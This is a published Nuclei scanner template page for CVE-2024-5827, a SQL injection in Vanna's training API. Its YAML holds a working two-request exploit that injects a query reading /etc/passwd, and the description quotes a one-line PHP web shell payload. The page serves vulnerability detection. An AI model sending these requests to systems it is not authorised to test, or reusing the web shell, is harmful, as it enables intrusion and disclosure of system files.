Skip to content
Nuclei Templates

Vanna - SQL injection

ID: CVE-2024-5827

Severity: critical

Author: olfloralo,nukunga,harksu,nechyo,gy741

Tags: cve,cve2024,vanna,sqli

Description

Section titled “Description”

Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim’s file system, such as backdoor.php with contents <?php system($_GET[0]); ?>. This can lead to command execution or the creation of backdoors.

YAML Source

Section titled “YAML Source”
id: CVE-2024-5827


info:
  name: Vanna - SQL injection
  author: olfloralo,nukunga,harksu,nechyo,gy741
  severity: critical
  description: |
    Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors.
  reference:
    - https://huntr.com/bounties/a3f913d6-c717-4528-b974-26d8d9e839ca
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5827
    - https://huntr.com/bounties/e4e64a51-618b-41d0-8f56-1d2146d8825e
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5827
    cwe-id: CWE-434
    epss-score: 0.00043
    epss-percentile: 0.09524
  metadata:
    verified: true
    max-request: 2
    fofa-query: body='vanna.ai'
  tags: cve,cve2024,vanna,sqli


flow: http(1) && http(2)


http:
  - raw:
      - |
        POST /api/v0/train HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"sql":"SELECT pg_read_file('/etc/passwd', 0, 1000);"}


    matchers:
      - type: word
        words:
          - 'id":'
        internal: true


  - raw:
      - |
        GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200


      - type: word
        part: header
        words:
          - 'application/json'
# digest: 4a0a00473045022038285de0a19541342be2fb2f9ebe6063ea9c4e9eeb0cfbae4b9daa6c67b14114022100f0c51c2770c99422e8693095a6e98ce2f74fd12ab322a71dfd678ef0130d854a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-5827.yaml"

View on Github